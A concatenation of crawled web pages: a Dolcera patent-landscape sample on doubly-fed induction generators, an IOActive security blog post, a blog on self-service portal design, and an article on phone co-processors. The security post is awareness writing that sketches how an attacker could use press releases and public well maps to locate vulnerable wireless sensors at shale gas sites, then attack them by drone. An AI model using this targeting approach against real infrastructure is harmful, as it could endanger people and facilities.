induction machine| |3||US7411309||08/12/08||Xantrex Technology||Control system for doubly fed induction generator| |4||US7485980||02/03/09||Hitachi||Power converter for doubly-fed power generator system| |5||US7800243||09/21/10||Vestas Wind Systems||Variable speed wind turbine with doubly-fed induction generator compensated for varying rotor speed| |6||US7830127||11/09/10||Wind to Power System||Doubly-controlled asynchronous generator| |S. No.||Class No.||Class Type||Definition| |1||F03D9/00||IPC||Machines or engines for liquids; wind, spring, or weight motors; producing mechanical power or a reactive propulsive thrust, not otherwise provided for / Wind motors / Adaptations of wind motors for special use; Combination of wind motors with apparatus driven thereby (aspects predominantly concerning driven apparatus)| |2||F03D9/00C||ECLA||Machines or engines for liquids; wind, spring, or weight motors; producing mechanical power or a reactive propulsive thrust, not otherwise provided for / Wind motors / Adaptations of wind motors for special use; Combination of wind motors with apparatus driven thereby (aspects predominantly concerning driven apparatus) / The apparatus being an electrical generator| |3||H02J3/38||IPC||Generation, conversion, or distribution of electric power / Circuit arrangements or systems for supplying or distributing electric power; systems for storing electric energy / Circuit arrangements for ac mains or ac distribution networks / Arrangements for parallely feeding a single network by two or more generators, converters or transformers| |4||H02K17/42||IPC||Generation, conversion, or distribution of electric power / Dynamo-electric machines / Asynchronous induction motors; Asynchronous induction generators / Asynchronous induction generators| |5||H02P9/00||IPC||Generation, conversion, or distribution of electric power / Control or regulation of electric motors, generators, or dynamo-electric converters; controlling transformers, reactors or choke coils / Arrangements for controlling electric generators for the purpose of obtaining a desired output| |6||290/044||USPC||Prime-mover dynamo plants / electric control / Fluid-current motors / Wind| |7||290/055||USPC||Prime-mover dynamo plants / Fluid-current motors / Wind| |8||318/727||USPC||Electricity: motive power systems / Induction motor systems| |9||322/047||USPC||Electricity: single generator systems / Generator control / Induction generator| |S. No.||Concept 1||Concept 2||Concept 3| Thomson Innovation Search Database: Thomson Innovation Patent coverage: US EP WO JP DE GB FR CN KR DWPI Time line: 01/01/1836 to 07/03/2011 |S. No.||Concept||Scope||Search String||No. of Hits| |1||Doubly-fed Induction Generator: Keywords(broad)||Claims, Title, and Abstract||(((((doubl*3 OR dual*3 OR two) ADJ3 (power*2 OR output*4 OR control*4 OR fed OR feed*3)) NEAR5 (induction OR asynchronous)) NEAR5 (generat*3 OR machine*1 OR dynamo*1)) OR dfig or doig)||873| |2||Doubly-fed Induction Generator: Keywords(broad)||Full Spec.||(((((doubl*3 OR dual*3 OR two) ADJ3 (power*2 OR output*1 OR control*4 OR fed OR feed*3)) NEAR5 (generat*3 OR machine*1 OR dynamo*1))) OR dfig or doig)||-| |3||Induction Machine: Classes||US, IPC, and ECLA Classes||((318/727 OR 322/047) OR (H02K001742))||-| |4||Generators: Classes||US, IPC, and ECLA Classes||((290/044 OR 290/055) OR (F03D000900C OR H02J000338 OR F03D0009* OR H02P0009*))||-| |5||Combined Query||-||2 AND 3||109| |6||Combined Query||-||2 AND 4||768| |7||French Keywords||Claims, Title, and Abstract||((((doubl*3 OR dual*3 OR two OR deux) NEAR4 (nourris OR feed*3 OR puissance OR sortie*1 OR contrôle*1)) NEAR4 (induction OR asynchron*1) NEAR4 (générateur*1 OR generator*1 OR machine*1 OR dynamo*1)) OR dfig or doig)||262| |8||German Keywords||Claims, Title, and Abstract||(((((doppel*1 OR dual OR two OR zwei) ADJ3 (ausgang OR ausgänge OR kontroll* OR control*4 OR gesteuert OR macht OR feed*1 OR gefüttert OR gespeiste*1)) OR (doppeltgefüttert OR doppeltgespeiste*1)) NEAR4 (((induktion OR asynchronen) NEAR4 (generator*2 OR maschine*1 OR dynamo*1)) OR (induktion?maschinen OR induktion?generatoren OR asynchronmaschine OR asynchrongenerator))) OR dfig)||306| |9||Doubly-fed Induction Generator: Keywords(narrow)||Full Spec.||(((((((doubl*3 OR dual*3) ADJ3 (power*2 OR output*4 OR control*4 OR fed OR feed*3))) NEAR5 (generat*3 OR machine*1 OR dynamo*1))) SAME wind) OR (dfig SAME wind))||1375| |10||Top Assignees||-||(vestas* OR (gen* ADJ2 electric*) OR ge OR hitachi OR woodward OR repower OR areva OR gamesa OR ingeteam OR nordex OR siemens OR (abb ADJ2 research) OR (american ADJ2 superconductor*) OR (korea ADJ2 electro*) OR (univ* NEAR3 navarra) OR (wind OR technolog*) OR (wind ADJ2 to ADJ2 power))||-| |11||Combined Query||-||2 AND 10||690| |12||Top Inventors||-||((Andersen NEAR2 Brian) OR (Engelhardt NEAR2 Stephan) OR (Ichinose NEAR2 Masaya) OR (Jorgensen NEAR2 Allan NEAR2 Holm) OR ((Scholte ADJ2 Wassink) NEAR2 Hartmut) OR (OOHARA NEAR2 Shinya) OR (Rivas NEAR2 Gregorio) OR (Erdman NEAR2 William) OR (Feddersen NEAR2 Lorenz) OR (Fortmann NEAR2 Jens) OR (Garcia NEAR2 Jorge NEAR2 Martinez) OR (Gertmar NEAR2 Lars) OR (KROGH NEAR2 Lars) OR (LETAS NEAR2 Heinz NEAR2 Hermann) OR (Lopez NEAR2 Taberna NEAR2 Jesus) OR (Nielsen NEAR2 John) OR (STOEV NEAR2 Alexander) OR (W?ng NEAR2 Haiqing) OR (Yuan NEAR2 Xiaoming))||-| |13||Combined Query||-||((3 OR 4) AND 10)||899| |14||Final Query||-||1 OR 5 OR 6 OR 7 OR 8 OR 9 OR 11 OR 13||2466(1060 INPADOC Families)| - Use the mouse(click and drag/scroll up or down/click on nodes) to explore nodes in the detailed taxonomy - Click on the red arrow adjacent to the node name to view the content for that particular node in the dashboard A sample of 139 patents from the search is analyzed based on the taxonomy. Provided a link below for sample spread sheet analysis for doubly-fed induction generators. |S.No.||Patent/Publication No.||Publication Date |1||US20100117605||05/13/10||Woodward||Method of and apparatus for operating a double-fed asynchronous machine in the event of transient mains voltage changes||The short-circuit-like currents in the case of transient mains voltage changes lead to a corresponding air gap torque which loads the drive train and transmission lines can damages or reduces the drive train and power system equipments.||The method presents that the stator connecting with the network and the rotor with a converter. The converter is formed to set a reference value of electrical amplitude in the rotor, by which a reference value of the electrical amplitude is set in the rotor after attaining a transient mains voltage change, such that the rotor flux approaches the stator flux.| |2||US20100045040||02/25/10||Vestas Wind Systems||Variable speed wind turbine with doubly-fed induction generator compensated for varying rotor speed||The DFIG system has poor damping of oscillations within the flux dynamics due to cross coupling between active and reactive currents, which makes the system potentially unstable under certain circumstances and complicates the work of the rotor current controller. These oscillations can damage the drive train mechanisms.||A compensation block is arranged, which feeds a compensation control output to the rotor of the generator. The computation unit computes the control output during operation of the turbine to compensate partly for dependencies on a rotor angular speed of locations of poles of a generator transfer function, so that the transfer function is made independent of variations in the speed during operation of the turbine which eliminates the oscillations and increases the efficiency of the wind turbine.| |3||US20090267572||10/29/09||Woodward||Current limitation for a double-fed asynchronous machine||Abnormal currents can damage the windings in the doubly- fed induction generator. Controlling these currents with the subordinate current controllers cannot be an efficient way to extract the maximum amount of active power.||The method involves delivering or receiving of a maximum permissible reference value of an active power during an operation of a double-fed asynchronous machine, where predetermined active power and reactive power reference values are limited to a calculated maximum permissible active and reactive power reference values, and hence ensures reliable regulated effect and reactive power without affecting the power adjustment, the rotor is electrically connected to a pulse-controlled inverter by slip rings with a static frequency changer, and thus a tension with variable amplitude and frequency is imposed in the rotor.| |4||US20090008944||01/08/09||Universidad Publica De Navarra||Method and system of control of the converter of an electricity generation facility connected to an electricity network in the presence of voltage sags in said network||Double-fed asynchronous generators are very sensitive to the faults that may arise in the electricity network, such as voltage sags. During the sag conditions the current which appears in said converter may reach very high values, and may even destroy it.||During the event of a voltage sag occurring, the converter imposes a new set point current which is the result of adding to the previous set point current a new term, called demagnetizing current, It is proportional to a value of free flow of a generator stator. A difference between a value of a magnetic flow in the stator of the generator and a value of a stator flow associated to a direct component of a stator voltage is estimated. A value of a preset calculated difference is multiplied by a factor for producing the demagnetizing current.| |5||US7355295||04/08/08||Ingeteam Energy||Variable speed wind turbine having an exciter machine and a power converter not connected to the grid||a) The active switching of the semiconductors of the grid side converter injects undesirable high frequency harmonics to the grid. b) The use of power electronic converters (4) connected to the grid (9) causes harmonic distortion of the network voltage. |Providing the way that power is only delivered to the grid through the stator of the doubly fed induction generator, avoiding undesired harmonic distortion. | Grid Flux Orientation (GFO) is used to accurately control the power injected to the grid. An advantage of this control system is that it does not depend on machine parameters, which may vary significantly, and theoretical machine models, avoiding the use of additional adjusting loops and achieving a better power quality fed into the utility grid. |6||US20080203978||08/28/08||Semikron||Frequency converter for a double-fed asynchronous generator with variable power output and method for its operation||Optislip circuit with a resistor is used when speed is above synchronous speed, results in heating the resistor and thus the generator leads to limitation of operation in super synchronous range which results in tower fluctuations.||Providing a back-to-back converter which contains the inverter circuit has direct current (DC) inputs, DC outputs, and a rotor-rectifier connected to a rotor of a dual feed asynchronous generator. A mains inverter is connected to a power grid, and an intermediate circuit connects one of the DC inputs with the DC outputs. The intermediate circuit has a semiconductor switch between the DC outputs, an intermediate circuit condenser between the DC inputs, and a diode provided between the semiconductor switch and the condenser. Thus the system is allowed for any speed of wind and reduces the tower fluctuations.| |7||US20070210651||09/13/07||Hitachi||Power converter for doubly-fed power generator system||During the ground faults, excess currents is induced in the secondary windings and flows into power converter connected to secondary side and may damage the power converter. Conventional methods of increasing the capacity of the power converter increases system cost, degrade the system and takes time to activate the system to supply power again.||The generator provided with a excitation power converter connected to secondary windings of a doubly-fed generator via impedance e.g. reactor, and a diode rectifier connected in parallel to the second windings of the doubly-fed generator via another impedance. A direct current link of the rectifier is connected in parallel to a DC link of the converter. A controller outputs an on-command to a power semiconductor switching element of the converter if a value of current flowing in the power semiconductor switching element is a predetermined value or larger.| |8||US20070132248||06/14/07||General Electric||System and method of operating double fed induction generators||Wind turbines with double fed induction generators are sensitive to grid faults. Conventional methods are not effective to reduce the shaft stress during grid faults and slow response and using dynamic voltage restorer (DVR) is cost expensive.||The protection system has a controlled impedance device. Impedance device has bidirectional semiconductors such triac, assembly of thyristors or anti-parallel thyristors. Each of the controlled impedance devices is coupled between a respective phase of a stator winding of a double fed induction generator and a respective phase of a grid side converter. The protection system also includes a controller configured for coupling and decoupling impedance in one or more of the controlled impedance devices in response to changes in utility grid voltage and a utility grid current. High impedance is offered to the grid during network faults to isolate the dual fed wind turbine generator.| |9||US20060192390||08/31/06||Gamesa Innovation||Control and protection of a doubly-fed induction generator system||A short-circuit in the grid causes the generator to feed high stator-currents into the short-circuit and the rotor-currents increase very rapidly which cause damage to the power-electronic components of the converter connecting the rotor windings with the rotor-inverter.||The converter is provided with a clamping unit which is triggered from a non-operation state to an operation state, during detection of over-current in the rotor windings. The clamping unit comprises passive voltage-dependent resistor element for providing a clamping voltage over the rotor windings when the clamping unit is triggered.| |10||US20050189896||09/01/05||ABB Research||Method for controlling doubly-fed machine||Controlling the double fed machines on the basis of inverter control to implement the targets set for the machine, this model is extremely complicated and includes numerous parameters that are often to be determined.||A method is provided to use a standard scalar-controlled frequency converter for machine control. A frequency reference for the inverter with a control circuit, and reactive power reference are set for the machine. A rotor current compensation reference is set based on reactive power reference and reactive power. A scalar-controlled inverter is controlled for producing voltage for the rotor of the machine, based on the set frequency reference and rotor current compensation reference.| Click here to view the detailed analysis sheet for doubly-fed induction generators patent analysis. |1||Study on the Control of DFIG and its Responses to Grid Disturbances||01/01/06||Power Engineering Society General Meeting, 2006. IEEE||Presented dynamic model of the DFIG, including mechanical model, generator model, and PWM voltage source converters. Vector control strategies adapted for both the RSC and GSC to control speed and reactive power independently. Control designing methods, such as pole-placement method and the internal model control are used. MATLAB/Simulink is used for simulation.| |2||Application of Matrix Converter for Variable Speed Wind Turbine Driving an Doubly Fed Induction Generator||05/23/06||Power Electronics, Electrical Drives, Automation and Motion, 2006. SPEEDAM 2006.||A matrix converter is replaced with back to back converter in a variable speed wind turbine using doubly fed induction generator. Stable operation is achieved by stator flux oriented control technique and the system operated in both sub and super synchronous modes, achieved good results.| |3||Optimal Power Control Strategy of Maximizing Wind Energy Tracking and Conversion for VSCF Doubly Fed Induction Generator System||08/14/06||Power Electronics and Motion Control Conference, 2006. IPEMC 2006. CES/IEEE 5th International||Proposed a new optimal control strategy of maximum wind power extraction strategies and testified by simulation. The control algorithm also used to minimize the losses in the generator. The dual passage excitation control strategy is applied to decouple the active and reactive powers. With this control system, the simulation results show the good robustness and high generator efficiency is achieved.| |4||A Torque Tracking Control algorithm for Doubly–fed Induction Generator||01/01/08||Journal of Electrical Engineering||Proposed a torque tracking control algorithm for Doubly fed induction generator using PI controllers. It is achieved by controlling the rotor currents and using a stator voltage vector reference frame.| |5||Fault Ride Through Capability Improvement Of Wind Farms Using Doubly Fed Induction Generator||09/04/08||Universities Power Engineering Conference, 2008. UPEC 2008. 43rd International||An active diode bridge crowbar switch presented to improve fault ride through capability of DIFG. Showed different parameters related to crowbar such a crowbar resistance, power loss, temperature and time delay for deactivation during fault.| Click here to view the detailed analysis sheet for doubly-fed induction generators article analysis. Top Cited Patents |S. No.||Patent/Publication No.||Publication Date |1||US5289041||02/22/94||US Windpower||Speed control system for a variable speed wind turbine||80| |2||US4982147||01/01/91||Oregon State||Power factor motor control system||62| |3||US5028804||07/02/91||Oregon State||Brushless doubly-fed generator control system||51| |4||US5239251||08/24/93||Oregon State||Brushless doubly-fed motor control system||49| |5||US6856038||02/15/05||Vestas Wind Systems||Variable speed wind turbine having a matrix converter||43| |6||WO1999029034||06/10/99||Asea Brown||A method and a system for speed control of a rotating electrical machine with flux composed of two quantities||36| |7||WO1999019963||04/22/99||Asea Brown||Rotating electric machine||36| |8||US7015595||03/21/06||Vestas Wind Systems||Variable speed wind turbine having a passive grid side rectifier with scalar power control and dependent pitch control||34| |9||US4763058||08/09/88||Siemens||Method and apparatus for determining the flux angle of rotating field machine or for position-oriented operation of the machine||32| |10||US7095131||08/22/06||General Electric||Variable speed wind turbine generator||25| Top Cited Articles White Space Analysis - White-space analysis provides the technology growth and gaps in the technology where further R&D can be done to gain competitive edge and to carry out incremental innovation. - Dolcera provides White Space Analysis in different dimensions. Based on Product, Market, Method of Use, Capabilities or Application or Business Area and defines the exact categories within the dimension. - Below table shows a sample representation of white space analysis for controlling DFIG parameters with converters, based on the sample analysis. |Doubly Fed Induction Generator - Dashboard| - Flash Player is essential to view the Dolcera dashboard - Vestas Wind Energy Systems and General Electric are the major players in wind energy generation technology. - Patenting activity has seen a very high growth rate in the last two years. - USA, China, Germany, Spain, and India are very active in wind energy research. - Around 86% patents are on controlling the doubly-fed induction generation(DFIG) which indicates high research activity going on in rating and controlling of the DFIG systems. Issues in the Technology - 86% of the patent on DFIG operation are focusing on grid connected mode of operation, suggesting continuous operation of the DFIG system during weak and storm winds, grid voltage sags, and grid faults are major issues in the current scenario. - Woodward is a new and fast developing player in the field of DFIG technology. The company filed 10 patent applications in the field in year 2010, while it has no prior IP activity. Like this report? This is only a sample report with brief analysis Dolcera can provide a comprehensive report customized to your needs |Buy the customized report from Dolcera| |Patent Analytics Services||Market Research Services||Purchase Patent Dashboard| |Patent Landscape Services||Dolcera Processes||Industry Focus| |Patent Search Services||Patent Alerting Services||Dolcera Tools|
<urn:uuid:890158dd-0320-492b-8e24-374653ea9593>
CC-MAIN-2017-09
https://www.dolcera.com/wiki/index.php?title=Wind_Energy&mobileaction=toggle_view_mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169776.21/warc/CC-MAIN-20170219104609-00409-ip-10-171-10-108.ec2.internal.warc.gz
en
0.818738
9,658
3.21875
3
By Cesar Cerrudo @cesarcer Every day we hear about a new vulnerability or a new attack technique, but most of the time it’s difficult to imagine the real impact. The current emphasis on cyberwar (cyber-warfare if you prefer) leads to myths and nonsense being discussed. I wanted to show real life examples of large scale attacks with big impacts on critical infrastructure, people, companies, etc. The idea of this post is to raise awareness. I want to show how vulnerable some industrial, oil, and gas installations currently are and how easy it is to attack them. Another goal is to pressure vendors to produce more secure devices and to speed up the patching process once vulnerabilities are reported. The attack in this post is based on research done by my fellow pirates, Lucas Apa and Carlos Penagos. They found critical vulnerabilities in wireless industrial control devices. This research was first presented at BH USA 2013. You can find their full presentation here https://www.blackhat.com/us-13/archives.html#Apa A common information leak occurs when vendors highlight how they helped Company X with their services or products. This information is very useful for supply chain attacks. If you are targeting Company X, it’s good to look at their service and product providers. It’s also useful to know what software/devices/technology they use. In this case, one of the vendors that sells vulnerable wireless industrial control devices is happy to announce in a press release that Company X has acquired its wireless sensors and is using them in the Haynesville Shale fields. So, as an attacker, we now know that Company X is using vulnerable wireless sensors at the Haynesville Shale fields. Haynesville Shale fields, what’s that? Interesting, with a quick Google search you end up with: How does Google know about shale well locations? It’s simple, publically-available information. You can display wells by name, organization, etc.: Even interactive maps are available: You can find all of Company X’s wells along with their exact location (geographical coordinates). You know almost exactly where the vulnerable wireless sensors are installed. Since the wells are at a remote location, exploiting the wireless sensor vulnerabilities becomes an interesting challenge. Enter drones, UAV unmanned aerial vehicles. Commercially available drones range from a couple hundred dollars to tens of thousands dollars, depending on range, endurance, functionality, etc. You can even build your own and save some money. The idea is to put the attack payload in a drone, send it to the wells’ location, and launch the attack. This isn’t difficult to do since drones can be programmed to fly to x,y coordinates and execute the payload while flying around the target coordinates (no need to return). Depending on your budget, you can launch an attack from a nearby location or very far away. Depending on the drone’s endurance, you can be X miles away from the target. You can extend the drone’s range depending on the radio and antenna used. The types of exploits you could launch from the drone range from bricking all of the wireless devices to causing some physical harm on the shale gas installations. Manipulating device firmware or injecting fake data on radio packets could make the control systems believe things like the temperature or pressure are wrong. Just bricking the devices could result in significant lost money to Company X. The devices would need to be reconfigured/reflashed. The exploits could interfere with shale gas extraction and even halt production. The consequences of an attack could be even more catastrophic depending on how the vulnerable devices are being used. Attacks could be expanded to target more than just one vendor’s device. Drones could do reconnaissance first, scan and identify devices from different vendors, and then launch attacks targeting all of the specific devices. In order to highlight attack possibilities and impact consequences I extracted the following from http://www.onworld.com/news/newsoilandgas.html (the companies mentioned in this article are not necessarily vulnerable, this is just for illustrative purposes): “…Pipelines & Corrosion Monitoring Wireless flow, pressure, level, temperature and valve position monitoring are used to streamline pipeline operation and storage while increasing safety and regulatory compliance. In addition, wireless sensing solutions are targeted at the billions of dollars per year that is spent managing pipeline corrosion. While corrosion is a growing problem for the aging pipeline infrastructure it can also lead to leaks, emissions and even deadly explosions in production facilities and refineries….” Leaks and deadly explosions can have sad consequences. Cyber criminals, terrorists, state actors, etc. can launch big impact attacks with relatively small budgets. Their attacks could produce economical loses, physical damage, even possible explosions. While isolated attacks have a small impact when put in the context of cyberwar, they can cause panic in populations, political crisis, or geopolitical problems if combined with other larger impact attacks. Probably in a future post I will describe more of these kinds of large scale, big impact attacks.
<urn:uuid:4b2ccb53-276c-434d-b91f-1fa6d1cce849>
CC-MAIN-2017-09
http://blog.ioactive.com/2013/11/practical-and-cheap-cyberwar-cyber.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170864.16/warc/CC-MAIN-20170219104610-00109-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925856
1,057
2.609375
3
IT has a notorious reputation for taking long established English words and twisting them to mean something different. For example, the word ‘programme’ (note deliberate English spelling of program) can mean a radio or TV programme or a programme of events or even a computer program. The same can be said for the word ‘portal,’ a word that, within the last few years, has gained a lot of popularity and buzz within IT.I’ve seen many definitions for the word ‘portal,’ including a gate, a door, the end of a tunnel, and even “a magical or technological doorway.” That one is my favourite. Why aren’t self-service portals exciting? Why shouldn’t they be fun and compelling? Too often they are just online form fillers with little or no graphic design or content.Using a portal for the first time is a voyage of discovery. Technicians tend to see portals as information exchanges, thus they give little thought to the portals design or usability. Portal users see portals as a reflection of the portal supplier (IT) and therefore the entire organisation or team is judged by the quality of the portal experience.I used to use one portal quite often. During my first visit, I noticed an obvious spelling mistake. There was nowhere within the portal where I could register this mistake. Eventually, I moved on to another portal, but when I made this shift, that particular mistake was still there! To make matters worse, the portal was boring and lacked any kind of lustre, which I assumed meant the company supplying the portal was the same. A portal is a reflection of the supplier and users will judge it accordingly. We do this in our personal lives, so why wouldn’t we do this with work? Tweet this: What do we need to do to secure a positive portal experience? You must first accept the fact that customers will judge an organization, team, or department by the portal provided to them. This includes the portal’s design, accuracy, usability, and feedback. For me, these are the four essential elements for a successful self-service portal. But of course, the portal must also always contain the collection and provision of information that meets both the portal creator’s and users’ technical needs. - Design is key. Do you remember when at school, if you hated a particular subject, you tried your best to avoid taking it? Sometimes this wasn’t possible, especially if it was a requirement. But if the subject was an option, you definitely could. The same is true with portals. If you don’t like a portal, you’ll avoid using it. For example, in the village where I live two banks have their ATM machines (Yes, an ATM machine is a portal) on opposite sides of the street. I will always cross the street to the same bank each time because I prefer its portal. If you provide a good tool, you’re enabling your customers (and yourselves) to be more efficient as a self-service portal is a vital business tool. The key point here is to involve your corporate marketing/graphic design team to help design your portal. At the very least, use corporate colours, fonts, and logos to design the portal to reflect the brand. - Accuracy is much more important than you might think. In essence, we are talking about image. “If they can’t spell, what else have they got wrong?” Stay alert because changes to the portal often bring those errors. You may classify these as incidents, but the user will call them mistakes. Monitor and measure portal usage to look for clues to improve or repair the portal. The Service Desk can be very useful by logging user concerns and questions and then feeding this information back to the portal owners. The Service Desk will hear all about portal issues when folks contact them with their incidents. Never accept second best when it comes to accuracy. - Human beings depend on feedback. Every second of every day your brain is constantly measuring your body and taking action such as telling you to take off your jumper (sweater, for my North American friends) because you are getting too hot. Likewise, using a device without a feedback button can cause resentment because a door has been closed. Make sure your portal contains a feedback button/link, a conduit for comments and suggestions. Feedback is an essential element for continual service improvement. It may not be possible to immediately fix a fault, but you can make sure that fault won’t appear in the next portal release. - For a long time, usability has been a thorn in the side of IT because business customers are becoming more and more IT literate. Simple things can cause great frustrations like re-entering your data when you make a mistake or not being able to translate a message on the screen into another language. To help prevent this, get folks who were not involved in developing the portal to review and provide their assessment prior to its launch. Effective usability leads to happy users. Take these four points, and consider them pitfalls to avoid. Your goal is to provide a useful, effective, and efficient means for your customers to connect with the business. This is a challenge, but as with any challenge, the rewards are significant. If you’ve developed a successful self-service portal like the National Trust for Scotland (here), please tell us about it and how it’s helping IT become more efficient.
<urn:uuid:dae4652e-358f-413d-a2fa-123902a09c32>
CC-MAIN-2017-09
https://www.cherwell.com/blog/4-pitfalls-to-avoid-when-creating-a-self-service-portal
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172017.60/warc/CC-MAIN-20170219104612-00161-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950381
1,127
2.59375
3
Over the last few years, chipmakers have relied more and more on integration to save energy, use less physical space, and increase performance in their products. It started with little things like the memory controller, but we have reached the point where almost every important chip in a computer can be combined into one do-everything piece of silicon called a "system-on-a-chip" (or SoC for short). This trend isn't going anywhere, but a few high-end phones recently have been trying something a bit different to enable unique features—they've included one (or more) small, low-power, extremely specialized co-processors designed to support very specific features. Why do this instead of building those features into the SoC along with everything else? We'll look at the just-announced iPhone 5S and the recently released Moto X to explain why. The M7 co-processor in the 5S and the pair of co-processors in the Moto X's "X8 Computing System" have one big thing in common: they're designed to do their thing when the phone is idle, or mostly idle. The M7 receives and processes data from the iPhone's various motion sensors, even when the phone is off and in your pocket, and one of the two co-processors in the Moto X is designed to show the low-power Active Notifications when the phone moves; the other is always listening for voice input. So why not integrate these features into the SoC itself? If you know anything about SoC design, you probably realize that the chips contain many things besides the CPU and GPU, and some of these blocks are actually more-or-less equivalent to co-processors. Video encoding and decoding, for example, is generally handled by a small dedicated block so that you can play video without taxing the more power-hungry CPU or GPU. That's fine for tasks like video decoding that occur often but not always, but not so much for features that are running constantly. While modern SoCs are generally good at "power gating," or shutting off unused portions of the chip when they're not needed, keeping any part of the SoC enabled at all times will lead to small amounts of power leakage. Over time, even this minor leakage can have an adverse effect on battery life. None of this is to say that using a co-processor is always the right way to go, but it makes sense for always-on-in-the-background features like those sported by the iPhone 5S and Moto X. Phones and tablets always have to maintain a delicate balance between performance, features, and power usage, and even small adjustments, like using a co-processor instead of the main SoC, can result in better battery life over time. Using co-processors to enable this unique functionality also gives some flexibility to Apple, Google, and anyone else who wants to enable similar features. Take the X8 Computing System (please!): in the Moto X, it consists of a Qualcomm Snapdragon SoC and the two co-processors, but Google has gone on the record that the co-processors are in no way married to that particular SoC. If Google and Motorola want to create a lower-cost version of the Moto X with a lesser SoC or upgrade the Moto X next year, they are free to use whatever chip they want to power most of the phone's operations. Because co-processors handle the Active Notifications and the touchless controls, Motorola won't have to throw the baby out with the bath water every time it changes SoCs. While Apple doesn't talk about its future plans, I'm pretty sure that the iPhone 5S won't be the only iDevice that picks up an M7. Say Apple puts out a new iPod touch next year (and it does seem to have settled into a two-year refresh cycle for that particular hardware, barring some kind of October surprise) and wants to increase its utility as a fitness device. Apple wants to increase its performance, but doesn't want to put a top-end A7 or A8 into a cheaper, lower-margin device. Keeping the M7 separate from the SoC would give the iPod maker the freedom to pair this hypothetical sixth-generation Touch with an A6, enabling those always-on features, but again not tying them to any specific chip. As others have noted, the M7 also seems like an ideal candidate for some kind of wearable computing device, where battery life is already shaping up to be an even bigger concern than it is in smartphones. Imagine the M7 paired with something like that single-core A5 that showed up in the Apple TV earlier this year, and you've got some pretty convincing smartwatch guts (assuming Apple is indeed working on such a device). Computing devices, and the chips that power them, are going to continue to become more integrated—there's no question about that. However, there are certain kinds of features where breaking something out from a monolithic SoC still makes sense, and as more and more manufacturers jump on the always-on-feature train, we're only going to see more of them.
<urn:uuid:afcadd26-1d81-4285-b4cc-6bc73464584e>
CC-MAIN-2017-09
https://arstechnica.com/gadgets/2013/09/the-iphone-5s-the-moto-x-and-the-rise-of-the-co-processor/?comments=1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00105-ip-10-171-10-108.ec2.internal.warc.gz
en
0.965645
1,063
2.921875
3